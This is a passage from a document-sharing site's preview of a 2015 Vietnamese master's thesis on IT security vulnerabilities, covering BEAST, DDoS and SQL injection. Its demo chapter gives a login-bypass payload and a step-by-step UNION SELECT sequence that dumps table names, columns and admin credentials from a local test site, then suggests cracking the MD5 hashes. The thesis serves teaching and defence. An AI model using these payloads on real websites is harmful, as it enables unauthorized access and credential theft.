Nghiên cứu một số lỗ hổng thiếu an ninh trong ứng dụng công nghệ thông tin, phương pháp và công cụ kiểm soát, xử lý lỗ hổng

91 654 3
Nghiên cứu một số lỗ hổng thiếu an ninh trong ứng dụng công nghệ thông tin, phương pháp và công cụ kiểm soát, xử lý lỗ hổng

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

ĐẠI HỌC QUỐC GIA HÀ NỘI TRƯỜNG ĐẠI HỌC CÔNG NGHỆ NGUYỄN MẠNH DŨNG NGHIÊN CỨU MỘT SỐ LỖ HỔNG THIẾU AN NINH TRONG ỨNG DỤNG CÔNG NGHỆ THÔNG TIN, PHƯƠNG PHÁP VÀ CƠNG CỤ KIỂM SỐT, XỬ LÝ LỖ HỔNG LUẬN VĂN THẠC SỸ CÔNG NGHỆ THÔNG TIN HÀ NỘI 2015 ĐẠI HỌC QUỐC GIA HÀ NỘI TRƯỜNG ĐẠI HỌC CÔNG NGHỆ NGUYỄN MẠNH DŨNG NGHIÊN CỨU MỘT SỐ LỖ HỔNG THIẾU AN NINH TRONG ỨNG DỤNG CÔNG NGHỆ THƠNG TIN, PHƯƠNG PHÁP VÀ CƠNG CỤ KIỂM SỐT, XỬ LÝ LỖ HỔNG Ngành: Công nghệ thông tin Chuyên ngành: Hệ thống thông tin Mã số: 60480104 LUẬN VĂN THẠC SỸ CÔNG NGHỆ THÔNG TIN NGƯỜI HƯỚNG DẪN KHOA HỌC: PGS TS Trịnh Nhật Tiến HÀ NỘI 22015 LỜI CAM ĐOAN Tôi xin cam đoan, kết luận văn hoàn toàn kết tự thân tơi tìm hiểu, nghiên cứu Các tài liệu tham khảo trích dẫn thích đầy đủ MỤC LỤC LỜI CAM ĐOAN DANH MỤC CÁC HÌNH VẼ BẢNG BIỂU GIỚI THIỆU Chương CÁC HIỂM HỌA VỀ AN NINH HỆ THỐNG THÔNG TIN 11 1.1 TỔNG QUAN VỀ CÁC HIỂM HỌA 11 1.1.1 Lạm dụng quyền vượt mức (Excessive Privilege Abuse) 12 1.1.2 Lạm dụng quyền hợp pháp (Legitimate Privilege Abuse) 13 1.1.3 Nâng cấp quyền bất hợp pháp (Unauthorized Privilege Elevation) 14 1.1.4 Lợi dụng điểm yếu tảng (Platform Vulnerabilities) 15 1.1.5 SQL Injection 16 1.1.6 Lợi dụng dấu vết kiểm toán yếu (Weak Audit Trail) 16 1.1.7 Tấn công từ chối dịch vụ (Denial of Service) 17 1.1.8 Lợi dụng điểm yếu giao thức giao tiếp sở liệu (Database Communication Protocol Vulnerabilities) 18 1.1.9 Lợi dụng xác thực yếu (Weak Authentication) 18 1.1.10 Lợi dụng sơ hở liệu dự phòng (Backup Data Exposure) 19 1.2 TỔNG QUAN VỀ CÁC LỖ HỔNG THIẾU AN NINH 20 1.2.1 Phân loại lỗ hổng theo mức độ 20 1.2.1.1 Các lỗ hổng loại C 20 1.2.1.2 Các lỗ hổng loại B 22 1.2.1.3 Các lỗ hổng loại A 23 1.2.2 Phân loại lỗ hổng theo thành phần hệ thống 25 1.2.2.1 Lỗ hổng cấu hình 25 1.2.2.2 Lỗ hổng giao thức mạng 27 1.2.2.3 Lỗ hổng hệ điều hành 32 1.2.2.4 Lỗ hổng ứng dụng 34 Chương MỘT SỐ LỖ HỔNG THIẾU AN NINH TRONG ỨNG DỤNG CÔNG NGHỆ THÔNG TIN 36 2.1 LỖ HỔNG BẢO MẬT TRONG GIAO THỨC TSL/SSL 36 2.1.1 Giới thiệu 36 2.1.2.Mô tả công BEAST lên giao thức SSL/TLS 36 2.1.3 Ý tưởng công Wei Dai đề xuất chống lại chế độ mã khối CBC 37 2.1.4 Tấn công lựa chọn giá trị biên (block-wise chosen-boundary attack) 40 2.1 Ứng dụng ý tưởng công Wei Dai để giải mã yêu cầu HTTPS 41 2.1 Giải pháp khắc phục ngăn chặn công 43 2.2 LỖ HỔNG BẢO MẬT GÂY RA TẤN CÔNG TỪ CHỐI DỊCH VỤ PHÂN TÁN (DDOS) 45 2.2.1 Tấn công từ chối dịch vụ phân tán DDoS(Distributed Denial of Service) 45 2.2.1.1 Giới thiệu khái quát DdoS 45 2.2.1.2 Các bước thực công kiểu DdoS 45 2.2.1.3 Mơ hình tổng quan DDoS attack-network 46 2.2.1.4 Phân loại công kiểu DdoS 50 2.2.2 Tấn công từ chối dịch vụ phản xạ nhiều vùng DRDoS (Distributed Reflection Denial of Service) 56 2.2.3 Biện pháp phịng chống cơng từ chối dịch vụ 57 2.2.3.1 Dựa vị trí triển khai 58 2.2.3.2 Dựa giao thức mạng 58 2.2.3.3 Dựa thời điểm hành động 60 2.3 LỖ HỔNG BẢO MẬT GÂY RA TẤN CƠNG SQL INJECTION 61 2.3.1 Tấn cơng SQL INJECTION 61 2.3.1.1 Giới thiệu SQL INJECTION 61 2.3.1.2 Các Dạng Tấn Công SQL Injection 61 2.3.2 Cách Phòng Tránh SQL Injection 68 2.3.2.1 Kiểm tra liệu 69 2.3.2.2 Thiết lập cấu hình an toàn cho hệ quản trị sở liệu 72 Chương MÔ PHỎNG TẤN CÔNG DẠNG SQL INJNECTION 73 3.1 CÀI ĐẶT CHƯƠNG TRÌNH 73 3.2 THỬ NGHIỆM CHƯƠNG TRÌNH 82 3.2.1 Tấn công vượt qua kiểm tra đăng nhập 82 3.2.2 Tấn công xử dụng câu lệnh Union Select 85 KẾT LUẬN 90 TÀI LIỆU THAM KHẢO 91 DANH MỤC CÁC HÌNH VẼ BẢNG BIỂU 1.1 Bảng danh sách dạng công phổ biến năm 2013, 2014 .10 2.1 Mô tả công Beast .35 2.2 Sơ đồ mã hóa khối CBC 36 2.3 Sơ đồ giải mã chế độ mã hóa khối CBC 36 2.4 Thêm chuỗi vào thông điệp để chọn ranh giới khối .38 2.5 Thực công lựa chọn biên với POST requers HTTPS .39 2.6 Sơ đồ phân loại kiểu cơng DdoS .45 2.7 Kiến trúc attack-network kiểu Agent – Handler 46 2.8 Kiến trúc attack-network kiểu IRC-Base 47 2.9 Phân loại kiểu công DdoS 48 2.10 Sơ đồ công kiểu Amplification Attack 51 2.11 Kiểu công TCP SYS Attack 52 2.12 Attacker giả mạo IP .53 2.13 Sơ đồ mô tả kiểu công DRDOS 55 2.14 Một cơng cụ tìm site lỗi Online 60 2.15 Dấu hiệu site bị lỗi SQL Injection .61 CÁC THUẬT NGỮ VÀ TỪ VIẾT TẮT STT Từ viết tắt SSL Ý nghĩa Giao thức chuẩn an ninh thông tin tạo liên kết mã hóa máy chủ web trình duyệt Victim Đối tượng bị công HTTP Giao thức truyền tải siêu văn HTTPS Giao thức truyền tải siêu văn an tồn có mã hóa Timeout Là khoảng thời gian lớn thiết lạp phiên làm việc máy khách máy chủ Server Máy chủ phục vụ DDoS Tấn công từ chối dịch vụ phân tán SQL injection Một kỹ thuật công vào hệ sở liệu cách chèn thêm câu lệnh truy vấn XSS Là kĩ thuật công cách chèn vào website động (ASP, PHP, CGI, JSP ) thẻ HTML hay đoạn mã script nguy hiểm 10 BEAST Là kỹ thuật khai thác điểm yếu chế độ mã khối CBC mức độ bảo mật yếu trình duyệt web Cookies Là dạng ghi tạo lưu lại trình duyệt người dùng truy cập website Trong lưu trữ thơng tin nhạy cảm ngườ sử dụng 11 GIỚI THIỆU Công nghệ thông tin ngày phát triển mạnh, số lượng người sử dụng Internet ngày tăng, lưu lượng truyền tải thông tin yêu cầu ngày lớn hoạt động giao dịch mạng internet phát triển theo, đặc biệt hoạt động trao đổi thông tin công dân với quan hành nhà nước quan hành nhà nước với Trước quan hành nhà nước cung cấp dịch vụ cho dân chúng trụ sở mình, nay, nhờ vào công nghệ thông tin viễn thông, quan hành nhà nước áp dụng nhiều cơng nghệ như: Mạng diện rộng, Internet, phương tiện di động để quan hệ với công dân, giới doanh nghiệp Qua cổng thông tin cho công dân (Citizen Portal) người dân nhận tìm hiều đầy đủ thông tin từ pháp luật, dịch vụ công thơng tin khác cần tìm hiểu mà khơng phải trực tiếp đến trụ sở quan trước Tại quan hành chính, liệu cơng văn, tài liệu số hóa lưu trữ quan trung tâm liệu (Data center) đơn vị thành phố nhằm đảm bảo trình giao dịch hiệu nhằm nâng cao công tác quản lý quan hành nhà nước Tuy nhiên việc trao đổi thông tin không tránh khỏi số đối tượng gián điệp truy cập trái phép vào hệ thống thông tin số thông báo, văn pháp luật, cơng văn nhằm mục đích xấu, gầy hậu nghiêm trọng thiệt hại lớn kinh tế, trị đơn vị Và việc đảm bảo an tồn thơng tin ln đặt lên hàng đầu hành điện tử An tồn thơng tin hành điện tử biện pháp nhằm đảm bảo tính bí mật cho thơng tin, tồn vẹn liệu, xác thực nguồn gốc an tồn, tơn trọng riêng tư, đảm bảo tính sẵn sàng an tồn thơng tin Vì vậy, việc kiểm sốt phát lỗ hổng thiếu an toàn an ninh hệ thống ứng dụng công nghệ thông tin vô quan trọng Từ giải pháp an tồn thơng tin cho hệ thống, cho ứng dụng cơng nghệ thơng tin tốn đặt cho quan hành Chính nhận thức tầm quan trọng an tồn thơng tin hành điện tử thơi thúc tơi thực đề tài “Nghiên cứu số lỗ hổng thiếu An ninh Ứng dụng công nghệ thông tin quan hành nhà nước, phương pháp cơng cụ kiểm soát, xử lý lỗ hổng” Bố cục đồ án gồm có chương, với nội dung chương sau: Chương 1: Các hiểm họa an ninh hệ thống thông tin Chương 2: Một số lỗ hổng thiếu an ninh ứng dụng công nghệ thông tin Chương 3: Mô số lỗ hổng Trước vào trình bày chi tiết nội dung đồ án, em xin gửi lời cảm ơn chân thành tới PGS.TS Trịnh Nhật Tiến định hướng giúp đỡ nhiệt tình để em hoàn thành đề tài tốt nghiệp Trong khoảng thời gian không nhiều, dù cố gắng để hoàn thành tốt đồ án, nhiên chắn đề tài khơng tránh khỏi sai sót, hạn chế, nên em mong góp ý chân tình thầy cơ, bạn bè để em tiếp tục hồn thiện đưa vào thực tiễn cách có hiệu Em xin trân trọng cảm ơn ! Học viên Nguyễn Mạnh Dũng 10 Sau khởi động xong, truy cập vào website với địa http://localhost thấy hiển thị trang giới thiệu XAMPP hình 77 Bạn ấn vào nút English phía bên để truy cập vào trang quản lý localhost Tạo sở liệu MySQL (Database) Để tạo database, bạn truy cập vào localhost với đường dẫn http://localhost/phpmyadmin Sau bạn nhấp vào menu Databases 78 Sau phần Create databsae, bạn nhập tên database cần tạo vào ô Database name(ở nhạp tên demo), phần Collation bạn chọn utf8_unicode_ci hình ấn nút Create kế bên Sau tạo xong import csdl demo có sẵn vào csdl vừa tạo Cơ sở liệu demo lưu code web có tên demo.sql 79 Chọn import đểm chèn csdl demo vào Chọn tệp demo.sql nhấn Go để chương trình import csdl vào Sau thành cơng hình bên 80 Chú ý: Khắc phục lỗi nạp CSDL vào phpMyAdmin bị giới hạn 2Mb (localhost): Mở file: php.ini Tìm: ; Maximum allowed size for uploaded files upload_max_filesize = 2M Sửa thành: ;Maximum allowed size for uploaded files upload_max_filesize = 200M (200 dung lượng mà bạn cho phép lần upload,tính theo Mega byte) Cài chương trình demo len localhost Sau cài xong xampp csdl demo Bạn copy thư mục code demo web vào đường dẫn C:\xampp\htdocs sau vào trình duyệt gõ địa chỉ: http://localhost/Demo/ Giao diện ứng dụng hình bên 81 3.2 THỬ NGHIỆM CHƯƠNG TRÌNH 1- Menu chức 2- Cử sổ mo trình duyệt 3- Code php tương ứng chương trình 4- Câu lệnh SQL tương ứng với thao tác truy xuất liệu người dùng 3.2.1 Tấn công vượt qua kiểm tra đăng nhập Code xử lý: 82 Cách thức vượt qua kiểm sốt: Đăng nhập với thơng tin đăng nhập sau đăng nhập với thơng tin sau Tên đăng nhập: ' or 'x'='x Mật khẩu: ' or 'x'='x 83 Màn hình login thành cơng xuất sau: Nhu thực thành công công vượt qua kiểm tra đăng nhập Fix lỗi SQL Injection: 84 3.2.2 Tấn công xử dụng câu lệnh Union Select Code xử lý: Tấn công: Bước 1: Kiểm tra lỗi SQL Injection http://localhost/Demo/news.php?id=13' 85 Bước 2: Tìm số cột mà câu truy vấn tạo dung order by (số cột) - http://localhost/Demo/news.php?id=16 order by => không lỗi - http://localhost/Demo/news.php?id=13 order by => Lỗi => Số cột 86 Bước 3: Tìm cột chứa thơng tin khai thác http://localhost/Demo/news.php?id=13 union select 1,2 Bước 4: Xác định tên bảng chưa thông tin người quản trị http://localhost/Demo/news.php?id=13 union select 1, group_concat (table_name) from information_schema.tables where table_schema=database() 87 Bước 5: Xác định trường liệu chứa thông tin quản trị http://localhost/Demo/news.php?id=13 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x75736572 Bước 6: Xác định tài khoản mật người quản trị http://localhost/Demo/news.php?id=150 union select user_name, pass from user Bước 7: Giải mã mật có tìm link trang đăng nhập chiếm quyền quản trị 88 Web giải mã md5: http://hashkiller.co.uk/ Code fix lỗi: 89 KẾT LUẬN Luận văn giới thiệu đưa cảnh báo với số hình thức cơng gây an tồn thơng tin vào hệ thống ứng dụng CNTT Mô tả chi tiết số dạng công phổ biến như: + Tấn công giao thức SSL/TSL: - Mô tả chi tiết cách thức công BEAST giải mã thông điệp - Đưa biện pháp khắc phục + Tấn cơng DDoS: - Đưa mơ hình công DDoS mô tả chi tiết - Đưa số biện pháp khắc phục + Tấn công dạng SQL injection: - Đưa cách thức tân công SQL injection lên trang web như: Tấn công vượt qua kiểm sốt truy nhập, cơng sử dụng câu lệnh union select, công sử dụng câu lệnh insert - Đưa số biện pháp khắc phục Các dạng công cho ta thấy nguy hiểm hiểm hệ thống mắc phải lỗ hổng an tồn, bảo mật thơng tin Luận văn đưa nhìn cụ thể số lỗ hổng an toàn bảo mật để cảnh báo cho người sử dụng quan nhà nước, doanh nghiệp nhận thấy tầm quan trọng việc đảm bảo an tồn thơng tin tham khảo biện pháp để khắc phục lỗ hổng Các nội dung luận văn bước nghiên cứu mở đầu, tiền đề để tiếp tục nghiên cứu chuyên sâu dạng cơng gây an tồn thơng tin vào giao thức SSL/TSL, Tấn công DDoS, Tấn công dạng SQL injection Đồng thời nghiên cứu mở rộng số loại cơng gây an tồn thơng tin khác 90 TÀI LIỆU THAM KHẢO Tiếng Việt [1] Ban yếu phủ (2014), viết cơng BEAST [2] Phân loại cơng DDoS biện pháp phịng chống Tác giả Hồng Xn Dậu, Học viên bưu viễn thông [3] Tấn công từ chối dịch vụ Dos,Ddos,DRDos Tác giả Ng Thanh Nghị-HVA [4] Tấn công mạng máy tính Tác giả PGS.TS Nguyễn Hiếu Minh [5] Tấn cơng kiểu SQL Injection-Tác hại phòng tránh Tác giả Lê Đình DuyKhoa CNTT-Trường ĐH Khoa Học Tự Nhiên TP.HCM [6] Trần Minh triết, Bài giảng Modes of Operation Padding Scheme [7] Trịnh Nhật Tiến, Giáo trình an tồn liệu – Khoa công nghệ thông tin, Đại học Công nghệ, Đại học quốc gia Hà Nội Tiếng Anh [8] An Introduction to SQL Injection Attacks For Oracle Developers.Author Stephen Kost [9] Pratik Guha Sarkar, Shawn Fitzgerald (2013), ATTACKS ON SSL A COMPREHENSIVE STUDY OF BEAST, CRIME, TIME, BREACH, LUCKY 13 & RC4 BIASES [10] Thai Duong, JulianoRizzo (May 13, 2011), Here Come The Ninjas [11] Kevin Spett, SQL Injection-Are you web Applications vulnerable [12] http://z6.invisionfree.com/iu4rum/ar/t98.htm 91 ... TRƯỜNG ĐẠI HỌC CÔNG NGHỆ NGUYỄN MẠNH DŨNG NGHIÊN CỨU MỘT SỐ LỖ HỔNG THIẾU AN NINH TRONG ỨNG DỤNG CÔNG NGHỆ THÔNG TIN, PHƯƠNG PHÁP VÀ CƠNG CỤ KIỂM SỐT, XỬ LÝ LỖ HỔNG Ngành: Công nghệ thông tin Chuyên... 1.2.2.3 Lỗ hổng hệ điều hành 32 1.2.2.4 Lỗ hổng ứng dụng 34 Chương MỘT SỐ LỖ HỔNG THIẾU AN NINH TRONG ỨNG DỤNG CÔNG NGHỆ THÔNG TIN 36 2.1 LỖ HỔNG BẢO MẬT TRONG GIAO... cụ kiểm sốt, xử lý lỗ hổng? ?? Bố cục đồ án gồm có chương, với nội dung chương sau: Chương 1: Các hiểm họa an ninh hệ thống thông tin Chương 2: Một số lỗ hổng thiếu an ninh ứng dụng công nghệ thông

Ngày đăng: 05/11/2015, 18:26

Từ khóa liên quan

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan